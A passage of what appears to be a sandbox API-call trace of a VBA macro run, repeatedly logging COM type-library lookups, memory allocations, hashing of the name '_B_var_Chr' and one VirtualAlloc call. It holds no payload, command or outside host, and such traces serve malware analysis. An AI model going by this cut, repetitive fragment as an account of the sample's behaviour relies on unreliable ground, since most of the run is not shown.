(This=0x7ffd098ff3f0, pv=0x1d39dbb34d0) [0060.479] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb42d0, pIndex=0x0 | out: ppTLib=0x33e4fb42d0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.479] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb42e0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb42e0, pDummy=0x0) returned 0x0 [0060.479] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.479] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.479] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb42d0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.479] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.479] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb42d0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0 | out: pBstrDllName=0x33e4fb42d0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0*=0x4560) returned 0x0 [0060.479] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000) returned 0x0 [0060.479] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xb) returned 0x1d39dbb34d0 [0060.479] _mbscpy_s (in: _Dst=0x1d39dbb34d0, _DstSizeInBytes=0x4, _Src=0x1d3a3172e3a | out: _Dst=0x1d39dbb34d0) returned 0x0 [0060.479] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="_B_var_Chr") returned 0x503b5c [0060.479] IUnknown:AddRef (This=0x1d3980663b0) returned 0xc [0060.479] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.479] IUnknown:AddRef (This=0x1d39d9d55e8) returned 0x3 [0060.479] IUnknown:Release (This=0x1d39d9d55e8) returned 0x2 [0060.479] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a98 | out: ppvObject=0x33e4fb4a98*=0x0) returned 0x80004002 [0060.479] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a90 | out: ppvObject=0x33e4fb4a90*=0x0) returned 0x80004002 [0060.479] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39dbb34d0) [0060.479] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb42d0, pIndex=0x0 | out: ppTLib=0x33e4fb42d0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.479] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb42e0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb42e0, pDummy=0x0) returned 0x0 [0060.479] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.479] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.479] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb42d0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.479] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.479] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb42d0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0 | out: pBstrDllName=0x33e4fb42d0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0*=0x4560) returned 0x0 [0060.480] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000) returned 0x0 [0060.480] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xb) returned 0x1d39dbb34d0 [0060.480] _mbscpy_s (in: _Dst=0x1d39dbb34d0, _DstSizeInBytes=0x4, _Src=0x1d3a3172e3a | out: _Dst=0x1d39dbb34d0) returned 0x0 [0060.480] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="_B_var_Chr") returned 0x503b5c [0060.480] IUnknown:AddRef (This=0x1d3980663b0) returned 0xc [0060.480] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.480] IUnknown:AddRef (This=0x1d39d9d55e8) returned 0x3 [0060.480] IUnknown:Release (This=0x1d39d9d55e8) returned 0x2 [0060.480] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a98 | out: ppvObject=0x33e4fb4a98*=0x0) returned 0x80004002 [0060.480] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a90 | out: ppvObject=0x33e4fb4a90*=0x0) returned 0x80004002 [0060.480] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39dbb34d0) [0060.480] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb42d0, pIndex=0x0 | out: ppTLib=0x33e4fb42d0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.480] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb42e0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb42e0, pDummy=0x0) returned 0x0 [0060.480] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.480] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.480] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb42d0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.480] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.480] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb42d0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0 | out: pBstrDllName=0x33e4fb42d0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0*=0x4560) returned 0x0 [0060.480] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000) returned 0x0 [0060.480] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xb) returned 0x1d39dbb34d0 [0060.480] _mbscpy_s (in: _Dst=0x1d39dbb34d0, _DstSizeInBytes=0x4, _Src=0x1d3a3172e3a | out: _Dst=0x1d39dbb34d0) returned 0x0 [0060.480] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="_B_var_Chr") returned 0x503b5c [0060.480] IUnknown:AddRef (This=0x1d3980663b0) returned 0xc [0060.480] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.480] IUnknown:AddRef (This=0x1d39d9d55e8) returned 0x3 [0060.480] IUnknown:Release (This=0x1d39d9d55e8) returned 0x2 [0060.480] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a98 | out: ppvObject=0x33e4fb4a98*=0x0) returned 0x80004002 [0060.480] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a90 | out: ppvObject=0x33e4fb4a90*=0x0) returned 0x80004002 [0060.481] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39dbb34d0) [0060.481] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb42d0, pIndex=0x0 | out: ppTLib=0x33e4fb42d0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.481] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb42e0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb42e0, pDummy=0x0) returned 0x0 [0060.481] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.481] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.481] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb42d0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.481] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.481] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb42d0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0 | out: pBstrDllName=0x33e4fb42d0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0*=0x4560) returned 0x0 [0060.481] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000) returned 0x0 [0060.481] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xb) returned 0x1d39dbb34d0 [0060.481] _mbscpy_s (in: _Dst=0x1d39dbb34d0, _DstSizeInBytes=0x4, _Src=0x1d3a3172e3a | out: _Dst=0x1d39dbb34d0) returned 0x0 [0060.481] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="_B_var_Chr") returned 0x503b5c [0060.481] IUnknown:AddRef (This=0x1d3980663b0) returned 0xc [0060.481] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.481] IUnknown:AddRef (This=0x1d39d9d55e8) returned 0x3 [0060.481] IUnknown:Release (This=0x1d39d9d55e8) returned 0x2 [0060.481] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a98 | out: ppvObject=0x33e4fb4a98*=0x0) returned 0x80004002 [0060.481] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a90 | out: ppvObject=0x33e4fb4a90*=0x0) returned 0x80004002 [0060.481] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39dbb34d0) [0060.481] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb42d0, pIndex=0x0 | out: ppTLib=0x33e4fb42d0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.481] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb42e0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb42e0, pDummy=0x0) returned 0x0 [0060.481] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.481] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.481] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb42d0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.481] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.481] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb42d0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0 | out: pBstrDllName=0x33e4fb42d0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0*=0x4560) returned 0x0 [0060.481] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000) returned 0x0 [0060.482] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xb) returned 0x1d39dbb34d0 [0060.482] _mbscpy_s (in: _Dst=0x1d39dbb34d0, _DstSizeInBytes=0x4, _Src=0x1d3a3172e3a | out: _Dst=0x1d39dbb34d0) returned 0x0 [0060.482] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="_B_var_Chr") returned 0x503b5c [0060.482] IUnknown:AddRef (This=0x1d3980663b0) returned 0xc [0060.482] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.482] IUnknown:AddRef (This=0x1d39d9d55e8) returned 0x3 [0060.482] IUnknown:Release (This=0x1d39d9d55e8) returned 0x2 [0060.482] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a98 | out: ppvObject=0x33e4fb4a98*=0x0) returned 0x80004002 [0060.482] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a90 | out: ppvObject=0x33e4fb4a90*=0x0) returned 0x80004002 [0060.482] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39dbb34d0) [0060.482] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb42d0, pIndex=0x0 | out: ppTLib=0x33e4fb42d0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.482] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb42e0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb42e0, pDummy=0x0) returned 0x0 [0060.482] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.482] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.482] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb42d0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.482] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.482] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb42d0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0 | out: pBstrDllName=0x33e4fb42d0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0*=0x4560) returned 0x0 [0060.482] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000) returned 0x0 [0060.482] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xb) returned 0x1d39dbb34d0 [0060.482] _mbscpy_s (in: _Dst=0x1d39dbb34d0, _DstSizeInBytes=0x4, _Src=0x1d3a3172e3a | out: _Dst=0x1d39dbb34d0) returned 0x0 [0060.482] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="_B_var_Chr") returned 0x503b5c [0060.482] IUnknown:AddRef (This=0x1d3980663b0) returned 0xc [0060.482] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.482] IUnknown:AddRef (This=0x1d39d9d55e8) returned 0x3 [0060.482] IUnknown:Release (This=0x1d39d9d55e8) returned 0x2 [0060.482] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a98 | out: ppvObject=0x33e4fb4a98*=0x0) returned 0x80004002 [0060.482] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a90 | out: ppvObject=0x33e4fb4a90*=0x0) returned 0x80004002 [0060.512] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39dbb34d0) [0060.512] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb42d0, pIndex=0x0 | out: ppTLib=0x33e4fb42d0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.512] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb42e0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb42e0, pDummy=0x0) returned 0x0 [0060.512] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.512] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.512] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb42d0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.513] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.513] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb42d0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0 | out: pBstrDllName=0x33e4fb42d0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0*=0x4560) returned 0x0 [0060.513] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000) returned 0x0 [0060.513] VirtualAlloc (lpAddress=0x0, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x1d3a3d60000 [0060.513] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xb) returned 0x1d39dbb34d0 [0060.513] _mbscpy_s (in: _Dst=0x1d39dbb34d0, _DstSizeInBytes=0x4, _Src=0x1d3a3172e3a | out: _Dst=0x1d39dbb34d0) returned 0x0 [0060.513] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="_B_var_Chr") returned 0x503b5c [0060.513] IUnknown:AddRef (This=0x1d3980663b0) returned 0xc [0060.513] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.513] IUnknown:AddRef (This=0x1d39d9d55e8) returned 0x3 [0060.513] IUnknown:Release (This=0x1d39d9d55e8) returned 0x2 [0060.514] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a98 | out: ppvObject=0x33e4fb4a98*=0x0) returned 0x80004002 [0060.514] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a90 | out: ppvObject=0x33e4fb4a90*=0x0) returned 0x80004002 [0060.514] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39dbb34d0) [0060.514] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb42d0, pIndex=0x0 | out: ppTLib=0x33e4fb42d0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.531] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb42e0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb42e0, pDummy=0x0) returned 0x0 [0060.531] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.531] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.531] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb42d0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.531] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.531] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb42d0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0 | out: pBstrDllName=0x33e4fb42d0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0*=0x4560) returned 0x0 [0060.531] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000) returned 0x0 [0060.531] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xb) returned 0x1d39dbb39f0 [0060.531] _mbscpy_s (in: _Dst=0x1d39dbb39f0, _DstSizeInBytes=0x4, _Src=0x1d3a3172e3a | out: _Dst=0x1d39dbb39f0) returned 0x0 [0060.531] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="_B_var_Chr") returned 0x503b5c [0060.531] IUnknown:AddRef (This=0x1d3980663b0) returned 0xc [0060.531] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.531] IUnknown:AddRef (This=0x1d39d9d55e8) returned 0x3 [0060.531] IUnknown:Release (This=0x1d39d9d55e8) returned 0x2 [0060.531] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a98 | out: ppvObject=0x33e4fb4a98*=0x0) returned 0x80004002 [0060.531] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a90 | out: ppvObject=0x33e4fb4a90*=0x0) returned 0x80004002 [0060.531] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39dbb39f0) [0060.531] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb42d0, pIndex=0x0 | out: ppTLib=0x33e4fb42d0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.531] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb42e0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb42e0, pDummy=0x0) returned 0x0 [0060.531] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.531] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.531] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb42d0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, 